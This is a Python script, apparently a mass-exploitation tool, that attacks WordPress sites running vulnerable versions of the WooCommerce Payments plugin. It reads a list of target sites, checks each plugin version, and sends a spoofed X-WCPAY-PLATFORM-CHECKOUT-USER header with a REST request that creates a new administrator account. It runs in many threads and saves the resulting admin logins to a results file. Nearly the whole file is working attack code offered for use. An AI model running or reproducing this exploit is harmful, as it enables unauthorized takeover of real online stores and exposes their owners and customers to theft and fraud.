mass-exploit-v2.py

# Made By L == Hanzou
import re
import sys
import urllib3
import requests
from colorama import Fore, Style
import threading
import random
import string

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def generate_random_password(length):
    characters = string.ascii_letters + string.digits
    password = ''.join(random.choice(characters) for _ in range(length))
    while not any(char.isdigit() for char in password) or not any(char.isupper() for char in password) or not any(char.islower() for char in password):
        password = ''.join(random.choice(characters) for _ in range(length))
    return password

def generate_random_email():
    username = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
    domain = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
    extension = random.choice(['com', 'net', 'org'])
    return f"{username}@{domain}.{extension}"

def exploit_website(website):
    if not website.startswith(("http://", "https://")):
        website = "https://" + website

    print(Fore.YELLOW + f'Exploiting {website}')
    try:
        r = requests.get(f"{website}/wp-content/plugins/woocommerce-payments/readme.txt", verify=False, timeout=10)
        version = re.search(r"Stable tag: (.*)", r.text).group(1)
        if version:
            if int(version.replace('.', '')) < 562:
                print(Style.RESET_ALL + "Site version:", Fore.GREEN + f"{version} - vulnerable!")
                headers = {
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/6.1.3035.111.',
                    'X-WCPAY-PLATFORM-CHECKOUT-USER': '1'
                }

                generated_username = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
                generated_password = generate_random_password(16)
                generated_email = generate_random_email()

                data = {
                    'rest_route': '/wp/v2/users',
                    'username': generated_username,
                    'email': generated_email,
                    'password': generated_password,
                    'roles': 'administrator'
                }

                with requests.Session() as session:
                    session.get(website, headers=headers, verify=False, timeout=10)
                    response = session.post(website, data=data, headers=headers, verify=False, timeout=10)
                    if response.status_code == 201:
                        with open("results.txt", "a") as file:
                            file.write(f"Site: {website}\n")
                            file.write(f"Login: {website}/wp-login.php\n")
                            file.write(f"Username: {generated_username}\n")
                            file.write(f"Email: {generated_email}\n")
                            file.write(f"Password: {generated_password}\n")
                            file.write(f"Login and change your email in {website}/wp-admin/profile.php\n\n")
                        print(Style.RESET_ALL + Fore.GREEN + "Vuln")
                        print(f"Site: {website}")
                        print(f"Login: {website}/wp-login.php")
                        print(f'Username: {generated_username}')
                        print(f'Email: {generated_email}')
                        print(f'Password: {generated_password}')
                    else:
                        print(Style.RESET_ALL + Fore.RED + "Not Vuln")
                        print(Fore.RED + "Failed to add admin.")
            else:
                print(Style.RESET_ALL + "Site version:", Fore.RED + f"{version} - not vulnerable!")
                print(Style.RESET_ALL + Fore.RED + "Not Vuln")
        else:
            print(Style.RESET_ALL + Fore.RED + "Version not found")
            print(Style.RESET_ALL + Fore.RED + "Not Vuln")
    except (requests.Timeout, requests.ConnectionError):
        print(Fore.RED + "Timeout occurred")
        print(Style.RESET_ALL + Fore.RED + "Not Vuln")
    except:
        print(Fore.RED + "Error occurred")
        print(Style.RESET_ALL + Fore.RED + "Not Vuln")
    finally:
        print()

def main():
    print()
    print(Fore.RED + "\t[ L == IM-Hanzou ]")
    print(Fore.BLUE + """  _      __          _____                                
 | | /| / /__  ___  / ___/__  __ _  __ _  ___ ___________ 
 | |/ |/ / _ \/ _ \/ /__/ _ \/  ' \/  ' \/ -_) __/ __/ -_)
 |__/|__/\___/\___/\___/\___/_/_/_/_/_/_/\__/_/  \__/\__/ 
                                                          """)
    print(Fore.YELLOW + "[ WooCommerce Payments - Unauthorized Add Admin User ]")
    print(Style.RESET_ALL)

    try:
        weblist = input('Weblist filename: ')
        with open(weblist, 'r') as file:
            websites = file.read().splitlines()
    except FileNotFoundError:
        print(Fore.RED + 'File not found!')
        sys.exit(1)
    if not websites:
        print(Fore.RED + 'Error: The website list is empty')
        sys.exit(1)
    try:
        num_threads = int(input('Threads (number): '))
        if num_threads <= 0:
            raise ValueError
    except ValueError:
        print(Fore.RED + "Threads must be a positive integer.")
        sys.exit(1)
    threads = []
    
    try:
        for website in websites:
            thread = threading.Thread(target=exploit_website, args=(website,))
            thread.start()
            threads.append(thread)
    except KeyboardInterrupt:
        print(Fore.YELLOW + "Force stopping the script...")

    for thread in threads:
        thread.join()

if __name__ == "__main__":
    main()